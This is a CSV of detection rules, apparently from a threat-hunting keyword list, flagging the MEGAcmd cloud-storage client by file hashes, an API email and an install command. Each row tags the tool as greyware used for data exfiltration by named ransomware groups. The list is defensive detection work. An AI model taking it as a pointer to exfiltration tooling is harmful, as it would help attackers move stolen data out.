"*66fc8fa5564448729b569b843c158d933d8774666651f98cfbd757ea9d721d94*",".{0,1000}66fc8fa5564448729b569b843c158d933d8774666651f98cfbd757ea9d721d94.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*690c56c5ebd58d596632a4ff28596df8aa478309fc979b9eb8b07fb89db4d944*",".{0,1000}690c56c5ebd58d596632a4ff28596df8aa478309fc979b9eb8b07fb89db4d944.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*6c20c6297aa22f6d3dcc00987a03ee30d2aff9051ba85832a6e20c3780bc599d*",".{0,1000}6c20c6297aa22f6d3dcc00987a03ee30d2aff9051ba85832a6e20c3780bc599d.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*6c2523493b48a91d2e484224c86431fddbbfb549d242a52182282ef8077341ae*",".{0,1000}6c2523493b48a91d2e484224c86431fddbbfb549d242a52182282ef8077341ae.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*6f0a3e80dcde8611beb4ac1d9e575601997e58b9a4a17054c5cb4eedf6f8062f*",".{0,1000}6f0a3e80dcde8611beb4ac1d9e575601997e58b9a4a17054c5cb4eedf6f8062f.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*6f35a34033499938700e42f4123399f711003d2dab83ed50e69f7df5ecf976d8*",".{0,1000}6f35a34033499938700e42f4123399f711003d2dab83ed50e69f7df5ecf976d8.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*6f54f9c1108613f68114da87cba5fc1c4a800d62fcfaf42d8b3cbb76436f5cb6*",".{0,1000}6f54f9c1108613f68114da87cba5fc1c4a800d62fcfaf42d8b3cbb76436f5cb6.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*75c997df094171b145b07be980e5812a4c853d8c5e0a6d465a3d5b924af7c23e*",".{0,1000}75c997df094171b145b07be980e5812a4c853d8c5e0a6d465a3d5b924af7c23e.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*772500800e1771de69a364caf268b648333c69c97b5727f132605ec01c51d2d0*",".{0,1000}772500800e1771de69a364caf268b648333c69c97b5727f132605ec01c51d2d0.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*776a5e227d275f6a777ea5c7886e69efe5b9ee9da3fd79700965f4809cde5d27*",".{0,1000}776a5e227d275f6a777ea5c7886e69efe5b9ee9da3fd79700965f4809cde5d27.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*7b2aeb01bd57aa53f1d615294fa425aaa3d82f43474ed529d9a33efb873a183e*",".{0,1000}7b2aeb01bd57aa53f1d615294fa425aaa3d82f43474ed529d9a33efb873a183e.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*7d9713740d78deeabff15b6080a387460a315a680777d4f1e04c498f1b708826*",".{0,1000}7d9713740d78deeabff15b6080a387460a315a680777d4f1e04c498f1b708826.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*7d97c9853b4bfb386f351545d1a4c0bafea316ccc6ca9c710a3db65ac622067a*",".{0,1000}7d97c9853b4bfb386f351545d1a4c0bafea316ccc6ca9c710a3db65ac622067a.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*7ec46c20cc8b0d99d230cf54b0e12d97ac4a5049f22badbe7164e7b6d75607d1*",".{0,1000}7ec46c20cc8b0d99d230cf54b0e12d97ac4a5049f22badbe7164e7b6d75607d1.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*7f21c8cb257523a9e810b7e7ae76308b2740fef55dc13f265c427876aa87b559*",".{0,1000}7f21c8cb257523a9e810b7e7ae76308b2740fef55dc13f265c427876aa87b559.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*7f4747710ba404d04c752320fce43e95fc680ee631fdee2e7ae3ceddb84420a9*",".{0,1000}7f4747710ba404d04c752320fce43e95fc680ee631fdee2e7ae3ceddb84420a9.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*8558ee2389b4493ff9b3d9bcab252564a817284583d651649ce79d7091ea45d3*",".{0,1000}8558ee2389b4493ff9b3d9bcab252564a817284583d651649ce79d7091ea45d3.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*89a1b21160a0e3890c45596d7832ff37474a2c3200423f23adee11ff676b295b*",".{0,1000}89a1b21160a0e3890c45596d7832ff37474a2c3200423f23adee11ff676b295b.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*8c191b2d03ec58627fd172193f1b90871524c5ebffe364f71308ee74de5168d4*",".{0,1000}8c191b2d03ec58627fd172193f1b90871524c5ebffe364f71308ee74de5168d4.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*8c35ea32fdfbf8dd949fb86b3f8badfb46d40cfbb6fb80fb174c0a39cc1547df*",".{0,1000}8c35ea32fdfbf8dd949fb86b3f8badfb46d40cfbb6fb80fb174c0a39cc1547df.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*8e34869d0ba4e0fce056c0c000758541cb48a494ee6e7b516cb3085ded7e44c7*",".{0,1000}8e34869d0ba4e0fce056c0c000758541cb48a494ee6e7b516cb3085ded7e44c7.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*90eff64c5a742c7d96d87648a15bcb33145ebebab593f0c0161dae22880b90a0*",".{0,1000}90eff64c5a742c7d96d87648a15bcb33145ebebab593f0c0161dae22880b90a0.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*91c60eb7b5f95951e96a2437ee51dbae7821377e8e4864279b41c53791481b6a*",".{0,1000}91c60eb7b5f95951e96a2437ee51dbae7821377e8e4864279b41c53791481b6a.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*92a11c9ee2af4ffb55d05210813c7ff309f90274a1d211018acc2643367b2534*",".{0,1000}92a11c9ee2af4ffb55d05210813c7ff309f90274a1d211018acc2643367b2534.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*94004895c51abc532d7bddc290fa71d5b390dec2daa7d4b9ecc6e257896ac564*",".{0,1000}94004895c51abc532d7bddc290fa71d5b390dec2daa7d4b9ecc6e257896ac564.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*9bb03c64894f76241a0c97d210a95a8a5d538a660b8067b1748dd157b1ddeaa6*",".{0,1000}9bb03c64894f76241a0c97d210a95a8a5d538a660b8067b1748dd157b1ddeaa6.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*9bc358f934bfbeb12347083aef6b7a6efe26846b83ce0e653a4b89c64ba89073*",".{0,1000}9bc358f934bfbeb12347083aef6b7a6efe26846b83ce0e653a4b89c64ba89073.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*a1f3b5d701bc32776e8a37bcda5a73dbde9d5b1de9f6037aac09cbbb2542d1cf*",".{0,1000}a1f3b5d701bc32776e8a37bcda5a73dbde9d5b1de9f6037aac09cbbb2542d1cf.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*a20fb6cf0d1e9c86de68b8665fbbf0974b04c69beccd41d7123f6b3004221beb*",".{0,1000}a20fb6cf0d1e9c86de68b8665fbbf0974b04c69beccd41d7123f6b3004221beb.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*a22417b2eccc3ab5a32aecee8bd004cbbef73fe80d58119d23223163985d1f6b*",".{0,1000}a22417b2eccc3ab5a32aecee8bd004cbbef73fe80d58119d23223163985d1f6b.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*a2798030e4a1455864158becf472780f95d347588b681031366fb776741c0880*",".{0,1000}a2798030e4a1455864158becf472780f95d347588b681031366fb776741c0880.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*a347a180847fa3dca00bc28dd1321f5b332fdf574c73ea2b30ef3fab63b2380b*",".{0,1000}a347a180847fa3dca00bc28dd1321f5b332fdf574c73ea2b30ef3fab63b2380b.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*a45f1250e0125326747fcd299ef10b98e39b4fa7e6d6865dabe0a6c8225013ef*",".{0,1000}a45f1250e0125326747fcd299ef10b98e39b4fa7e6d6865dabe0a6c8225013ef.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*a48dfc0e20bd69e3774d74860f2a74691addf9fbaae42c71450561a4d526f92a*",".{0,1000}a48dfc0e20bd69e3774d74860f2a74691addf9fbaae42c71450561a4d526f92a.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*aa3244dd4ccc78f549783e6f27951d294aa6a54f349bd9eef5c89830e1742505*",".{0,1000}aa3244dd4ccc78f549783e6f27951d294aa6a54f349bd9eef5c89830e1742505.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*aab45aa9eac5e0b9865f44a234f6c5cddbc3b2fcb14aa4fee101cbcef2ba37d8*",".{0,1000}aab45aa9eac5e0b9865f44a234f6c5cddbc3b2fcb14aa4fee101cbcef2ba37d8.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*ab36f1dcf6cfd93b95bf5394b1ef22deff505df685c9b0a36d25fa9c94f4b548*",".{0,1000}ab36f1dcf6cfd93b95bf5394b1ef22deff505df685c9b0a36d25fa9c94f4b548.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*abb90f97b0e132f7d40af31e0935f7d15bb737d2ee59650e6846ddbca1f8afe9*",".{0,1000}abb90f97b0e132f7d40af31e0935f7d15bb737d2ee59650e6846ddbca1f8afe9.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*ac1d8b0b8458ec134d5c85fa863c3d8ed016e35454dedae79698ad0818919b7f*",".{0,1000}ac1d8b0b8458ec134d5c85fa863c3d8ed016e35454dedae79698ad0818919b7f.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*add7fb1cea253b5e58f7ab41b8db1ef3438c6dd59c6f5d95dfc18c60097ca5f3*",".{0,1000}add7fb1cea253b5e58f7ab41b8db1ef3438c6dd59c6f5d95dfc18c60097ca5f3.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*api@mega.nz*",".{0,1000}api\@mega\.nz.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#email","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*apt install *megacmd*",".{0,1000}apt\sinstall\s.{0,1000}megacmd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*b159333d4411c72736ec1c54cbca34c6ead9ff7779de79dc968387e61570f0d5*",".{0,1000}b159333d4411c72736ec1c54cbca34c6ead9ff7779de79dc968387e61570f0d5.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*b309f0785461dbe35a63b0a674cc70381ef7f87720d2aa884a8dbc8ae3c2c42e*",".{0,1000}b309f0785461dbe35a63b0a674cc70381ef7f87720d2aa884a8dbc8ae3c2c42e.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
